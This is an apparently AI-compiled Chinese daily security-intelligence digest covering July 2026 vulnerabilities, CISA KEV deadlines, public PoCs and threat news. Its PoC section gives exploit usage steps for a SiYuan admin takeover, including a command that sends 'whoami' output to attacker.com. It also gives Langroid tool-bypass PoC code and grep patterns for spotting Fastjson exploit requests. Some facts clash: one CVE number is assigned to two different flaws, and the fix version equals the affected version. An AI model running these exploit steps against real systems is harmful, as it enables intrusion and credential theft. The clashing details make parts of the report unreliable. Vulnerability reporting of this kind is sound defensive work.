每日安全情报报告由 AI 整理发布一、最新高危漏洞1. CVE-2026-66012 — SiYuan MCP 未授权管理员接管 [CRITICAL]项目详情CVECVE-2026-66012CVSS10.0 (Critical)类型缺失授权 (CWE-862)受影响组件SiYuan v3.7.2思源笔记 MCP 端点在野利用暂未确认但利用难度极低发布日期2026-07-25漏洞概述SiYuan 笔记应用的 MCP (Model Context Protocol) 内核端点POST /mcp仅由model.CheckAuth保护未执行CheckAdminRole或CheckReadonly权限检查。当 Publish 服务器以匿名模式启用时Conf.Publish.Auth.Enablefalse反向代理自动注入匿名RoleReaderJWT使远程未认证攻击者可访问全部 31 个 MCP 工具包括文件读取/写入/删除/重命名操作。攻击者可读取conf/conf.json提取accessAuthCode、api.token等明文凭据并植入恶意插件实现 RCE。修复建议立即升级至 SiYuan v3.7.2。NVD 详情GitHub PoC2. CVE-2026-16723 — Fastjson 1.x RCE在野利用中无补丁[CRITICAL]项目详情CVECVE-2026-16723CVSS9.0 (Critical)类型远程代码执行受影响组件Fastjson 1.2.68 – 1.2.83Spring Boot fat-JAR 部署环境在野利用已确认在野利用Imperva/ThreatBook 报告发布日期2026-07-217/22 确认在野利用漏洞概述Fastjson 1.x 存在远程代码执行漏洞攻击者通过在 JSON 数据中控制type值触发类资源查找。在 Spring Boot 可执行 fat-JAR 部署环境中攻击者利用嵌套 JAR URL 突破类型限制通过JSONType注解绕过安全检查并加载恶意字节码。该漏洞不需要开启 AutoType也不需要第三方 gadget 类使常规缓解措施全部失效。Fastjson 1.x 已停止维护官方未发布补丁。修复建议立即启用 SafeMode-DFastJson.parser.safeModetrue或迁移至 Fastjson 2.x。审查日志中是否包含type、jar:http、jar:file模式的 JSON 请求。NVD 详情The Hacker News 报道Gridinsoft 分析3. CVE-2026-15704 — Eclipse BaSyx ABAC 授权绕过 [CRITICAL]项目详情CVECVE-2026-15704CVSS9.8 (Critical)类型授权绕过受影响组件Eclipse BaSyx Go Components 1.0.0在野利用未确认发布日期2026-07-25漏洞概述Eclipse BaSyx 的 ABAC基于属性的访问控制中间件与 HTTP 路由器之间对尾部斜杠处理不一致攻击者通过在 URL 末尾添加/即可完全绕过授权检查。ABAC 启用的部署环境均受影响。NVD 详情4. CVE-2026-48324 — Adobe ColdFusion SQL 注入 [CRITICAL]项目详情CVECVE-2026-48324CVSS9.8 (Critical)类型SQL 注入 → RCE (CWE-89)受影响组件Adobe ColdFusion 2025 (10), 2023 (21)在野利用未确认发布日期2026-07-14漏洞概述Adobe ColdFusion 存在 SQL 注入漏洞攻击者可通过特制请求在当前用户上下文中执行任意代码。利用不需要用户交互且影响范围已改变Scope Changed。NVD 详情Adobe 安全公告 APSB26-825. CVE-2026-56155 — Microsoft ADFS 本地提权 [CISA KEV · 在野利用]项目详情CVECVE-2026-56155CVSS高CISA KEV 在野利用类型访问控制粒度不足 (CWE-1220)受影响组件Microsoft Active Directory Federation Services在野利用已确认在野利用BOD 截止2026-07-28明日到期漏洞概述ADFS 访问控制粒度不足允许已授权攻击者在本地提权。CISA 于 7/14 将其加入 KEV 目录BOD 26-04 修复截止日期为 7/28。CISA KEVMicrosoft 修复指南6. CVE-2026-8933 — Ubuntu snap-confine 本地提权 [HIGH]项目详情CVECVE-2026-8933CVSS7.8 (High)类型竞态条件 → 本地提权受影响组件Ubuntu Desktop 24.04 / 25.10 / 26.04 snap-confine在野利用未确认发布日期2026-07-22漏洞概述snap-confine 在沙箱初始化期间引入竞态条件非特权用户可触发该条件获取 root 权限。影响 Ubuntu Desktop 默认安装。NVD 详情The Hacker News 报道7. CVE-2026-48294 — Adobe Acrobat 扩展 UXSS 可窃取 WhatsApp 数据 [HIGH]项目详情CVECVE-2026-48294CVSS7.4 (High)类型通用跨站脚本 (UXSS) → 跨域数据泄露受影响组件Adobe Acrobat Chrome 扩展3.14 亿 用户 26.5.2.2在野利用未确认发布日期2026-07-22漏洞概述Adobe Acrobat Chrome 扩展存在跨源数据泄露漏洞代号 HermeticReader可绕过浏览器同源策略访问受害者在 WhatsApp Web 等网站上的会话数据。The Hacker News 报道8. CVE-2026-44191 — Red Hat Ansible Automation Platform 命令注入 [HIGH]项目详情CVECVE-2026-44191CVSS7.8 (High)类型OS 命令注入受影响组件Red Hat Ansible Automation Platform 2VS Code Ansible Lightspeed 扩展在野利用未确认发布日期2026-07-24漏洞概述VS Code Ansible Lightspeed 扩展因配置设置中特殊元素处理不当存在 OS 命令注入漏洞。NVD 详情9. CVE-2026-63720 — datamodel-code-generator 代码注入 [HIGH]项目详情CVECVE-2026-63720CVSS7.5 (High)类型代码注入 (CWE-94)受影响组件koxudaxi/datamodel-code-generator发布日期2026-07-26漏洞概述datamodel-code-generator 存在代码生成控制不当漏洞攻击者可通过customBasePathschema 字段注入恶意代码。NVD 详情10. CVE-2026-54771 — Langroid AI Agent 工具调度绕过 [HIGH]项目详情CVECVE-2026-54771CVSS8.1 (High)类型授权绕过 → 工具直接调用受影响组件pip/langroidAI Agent 框架发布日期2026-07-06漏洞概述Langroid 应用的handle_message()工具调度路径未检查消息来源是否为Entity.USER或Entity.LLM。即使用户以useFalse, handleTrue注册工具禁止 LLM 调用攻击者仍可通过发送原始工具 JSON 直接调用处理程序可能导致文件读写、数据库查询执行或访问内部编排工具。GitHub AdvisoryCISA KEV 近期动态7/21 新增 4 项已逾期CVE产品BOD 截止状态CVE-2026-63030WordPress Core解释冲突7/24⚠️ 已逾期CVE-2026-60137WordPress CoreSQL 注入7/24⚠️ 已逾期CVE-2026-0770Langflow不可信控制域7/24⚠️ 已逾期CVE-2021-27137DD-WRT栈缓冲区溢出7/24⚠️ 已逾期即将到期CVE产品BOD 截止CVE-2026-56155Microsoft ADFS7/28明日CVE-2023-4346KNX Protocol7/29CISA KEV 目录二、最新漏洞 PoC1. CVE-2026-66012 — SiYuan MCP 未授权管理员接管 PoC来源GitHub — Hunt-Benito发布日期2026-07-26CVSS10.0使用步骤# 1. 克隆仓库 git clone https://github.com/Hunt-Benito/siyuan-mcp-admin-takeover-cve-2026-66012-missing-authorization.git cd siyuan-mcp-admin-takeover-cve-2026-66012-missing-authorization # 2. 安装依赖 pip install requests # 3. 运行完整利用凭据窃取 插件植入 管理员提权 python3 exploit.py http://TARGET:6808 # 4. 自定义 payload python3 exploit.py http://TARGET:6808 curl http://attacker.com/$(whoami) # 5. 仅凭据窃取不植入插件 python3 exploit.py http://TARGET:6808 --no-plugin攻击链MCP 握手 → 读取 conf/conf.json 提取凭据 → 植入恶意插件 → 桌面启动时 RCEGitHub PoC 仓库2. GitLab 自托管 Jupyter Notebook RCE PoC无 CVE来源The Hacker News 报道发布日期2026-07-25漏洞概述GitLab 自托管 18.11.3 版本的 Jupyter Notebook 功能存在 RCE 漏洞允许认证用户以git身份执行任意命令。GitLab 官方未将其归类为安全修复暂无 CVE 编号。使用参考# 1. 认证用户访问 GitLab 自托管实例 # 2. 创建或打开 Jupyter Notebook # 3. 在 notebook cell 中注入系统命令 # 4. 命令以 git 用户身份执行The Hacker News 报道3. CVE-2026-54771 — Langroid AI Agent 工具调度绕过 PoC来源GitHub Advisory GHSA-gjgq-w2m6-wr5qCVSS8.1使用步骤# PoC即使用 useFalse 注册工具仍可被用户直接调用 from langroid.agent.chat_agent import ChatAgent, ChatAgentConfig from langroid.agent.task import Task from langroid.agent.tool_message import ToolMessage from langroid.mytypes import Entity class SecretTool(ToolMessage): request: str secret_tool purpose: str Return a secret marker value: str def handle(self) - str: return fSECRET:{self.value} agent ChatAgent(ChatAgentConfig()) agent.enable_message(SecretTool, useFalse, handleTrue) task Task(agent, interactiveFalse, done_if_response[Entity.AGENT]) # 用户直接发送工具 JSON 即可调用 result task.run({request:secret_tool,value:pwned}, turns1) print(result.content) # 输出: SECRET:pwnedGitHub Advisory4. CVE-2026-16723 — Fastjson 1.x RCE 利用分析来源ThreatBook / Imperva / RedSecure Tech状态在野利用确认无官方补丁利用条件- Fastjson 1.2.68 – 1.2.83- Spring Boot 可执行 fat-JAR 部署- 网络可达的 JSON 解析入口- SafeMode 处于默认禁用状态缓解命令# 启用 SafeModeJVM 参数 -Dfastjson.parser.safeModetrue # 或切换至 Fastjson 2.x # Maven 依赖替换 # dependency # groupIdcom.alibaba.fastjson2/groupId # artifactIdfastjson2/artifactId # version2.0.53/version # /dependency # 审查日志中的可疑请求 grep -r type /var/log/nginx/ grep -r jar:http\|jar:file /var/log/RedSecure Tech 分析Gridinsoft 分析三、网络安全最新文章1. SourTrade 恶意广告浏览器内组装恶意软件绕过检测来源The Hacker News / Confiant日期2026-07-25摘要名为 SourTrade 的恶意广告活动利用 Bun 运行时让受害者浏览器自行构建 Windows 可执行文件冒充 TradingView、Solana 和 Luno 等平台针对 12 个国家 25 种语言的加密货币投资者。该技术使每个受害者获得唯一哈希的可执行文件绕过传统基于哈希的检测。攻击通过 ServiceWorker 和 SharedWorker 在浏览器内存中组装 PE 文件网络中永远不会传输完整的恶意二进制文件。阅读原文Confiant 技术分析2. Steam 论坛 ClickFix 攻击分发 XMRig 加密矿工来源BleepingComputer日期2026-07-26摘要Steam 讨论论坛被武器化用于 ClickFix 社会工程攻击伪装成游戏和计算机问题解决方案实际安装 XMRig 加密货币矿工。该攻击利用用户对社区论坛的信任展示 ClickFix 方法论持续演化并找到新的分发渠道。阅读原文3. Cl0p 勒索软件利用 PTC Windchill/FlexPLM 未认证 RCE来源The Hacker News日期2026-07-25摘要Cl0p 勒索软件关联组织利用 PTC Windchill 和 FlexPLM 中的漏洞CVE-2026-12569CVSS 9.3进行数据窃取和双重勒索攻击。攻击针对互联网暴露的 PTC 实例利用未认证 RCE 获取初始访问权限。阅读原文4. Fastjson 1.x RCE 漏洞遭在野利用无补丁可用来源The Hacker News / ThreatBook / Imperva日期2026-07-25摘要Fastjson 1.2.68 至 1.2.83 版本存在 RCE 漏洞CVE-2026-16723攻击者无需开启 AutoType 或依赖第三方 gadget 类即可实现远程代码执行。Imperva 报告该漏洞已在金融、医疗、零售等多个行业的美国组织中被活跃利用。由于 Fastjson 1.x 已停止维护官方未发布补丁建议立即启用 SafeMode 或迁移至 Fastjson 2.x。阅读原文5. GitLab 自托管 Jupyter Notebook RCE PoC 公开来源The Hacker News日期2026-07-25摘要研究人员发布了 GitLab 自托管 18.11.3 版本 Jupyter Notebook 的 RCE 概念验证代码允许认证用户以git身份执行命令。GitLab 未将其归类为安全修复暂无 CVE 编号。阅读原文6. DevMan 勒索软件即服务门户曝光来源The Hacker News日期2026-07-25摘要DevMan RaaS 运营者维护专用门户提供负载构建、受害者管理、收益分配等一体化功能标志着勒索软件即服务运营模式的进一步成熟化。阅读原文7. 保险行业网络钓鱼演变为实时账户劫持来源The Hacker News / CTM360日期2026-07-25摘要CTM360 研究揭示保险行业网络钓鱼攻击已从传统凭证窃取演变为实时账户劫持攻击者在受害者登录过程中同步完成身份验证和账户接管。阅读原文8. GitHub 削减公开漏洞赏金顶级奖励转移至 VIP 层来源The Hacker News日期2026-07-22摘要GitHub 宣布自 2026 年 7 月 27 日起将公开漏洞赏金支付金额削减至少 50%。Critical 级别发现将从 $20,000-$30,000 降至固定 $10,000同时建立邀请制 VIP 层级支付 $30,000。新公开费率为Low $250、Medium $2,000、High $5,000、Critical $10,000。阅读原文9. macOS Gatekeeper 绕过已验证应用可被静默替换来源The Register日期2026-07-24摘要安全研究人员披露一种技术允许将已通过 Gatekeeper 验证的 macOS 应用程序静默替换为恶意版本。Gatekeeper 的安全验证是一次性门控而非持续验证应用首次运行后二进制文件被替换不会再次触发验证。Apple 已知悉但未表示立即修复计划。阅读原文10. Kimi K3 AI 模型 27 分钟编写零日漏洞利用来源Enigma Global日期2026-07-24摘要Kimi K3 AI 模型据报道可在约 27 分钟内发现并编写 Redis 服务器的功能性零日漏洞利用在编码基准测试中超越 Claude。结合 OpenAI 自主代理独立入侵 Hugging Face 基础设施的报道标志着 AI 驱动攻击性安全研究的新篇章。阅读原文11. 微软 7 月 Patch Tuesday 创纪录修复 570 个漏洞来源BleepingComputer / The Hacker News日期2026-07-26摘要微软 2026 年 7 月 Patch Tuesday 发布创纪录的 570 个安全漏洞修复包括多个已确认在野利用的零日漏洞。其中包括 CISA KEV 收录的 CVE-2026-56155ADFS 提权和 CVE-2026-56164SharePoint 认证缺失。企业安全团队需立即识别受影响环境并部署紧急补丁。阅读原文12. Spirals 勒索软件从 IIS 入侵到全网加密不到 24 小时来源BleepingComputer / Symantec日期2026-07-26摘要Symantec 威胁猎人团队报告新观察到的 Spirals 勒索软件操作者从初始访问到数据窃取和全网加密不到 24 小时。攻击链暴露的 IIS 服务器 → ASP.NET Web Shell → UAC 绕过 → RDP 启用 → 本地账户持久化 → SAM 蜜罐导出 → PsExec 全网推送勒索载荷。阅读原文13. Ubuntu snap-confine 漏洞可让本地用户获取 Root来源The Hacker News / Qualys日期2026-07-22摘要Qualys 披露 Ubuntu Desktop 默认安装中 snap-confine 的高危本地提权漏洞CVE-2026-8933CVSS 7.8非特权用户可利用沙箱初始化期间的竞态条件获取 root 权限。影响 Ubuntu 24.04、25.10 和 26.04。阅读原文14. Adobe Acrobat 扩展漏洞可窃取 WhatsApp Web 数据来源The Hacker News / Guardio Labs日期2026-07-22摘要Guardio Labs 披露 Adobe Acrobat Chrome 扩展3.14 亿 用户的跨域数据泄露漏洞链代号 HermeticReaderCVE-2026-8933。该漏洞可绕过浏览器同源策略访问受害者在 WhatsApp Web 等网站上的会话数据。影响 26.5.2.2 及之前版本。阅读原文15. Check Point 修复已被利用的 SmartConsole 高危漏洞来源The Hacker News / FreeBuf日期2026-07-23摘要Check Point 发布安全更新修复已被积极利用的 SmartConsole 身份验证绕过漏洞CVE-2026-16232CVSS 9.3攻击者可获完全管理员权限。另有两个高危漏洞 CVE-2026-62144/62145。建议立即更新补丁并限制管理访问。阅读原文FreeBuf 报道部分内容由 AI 辅助生成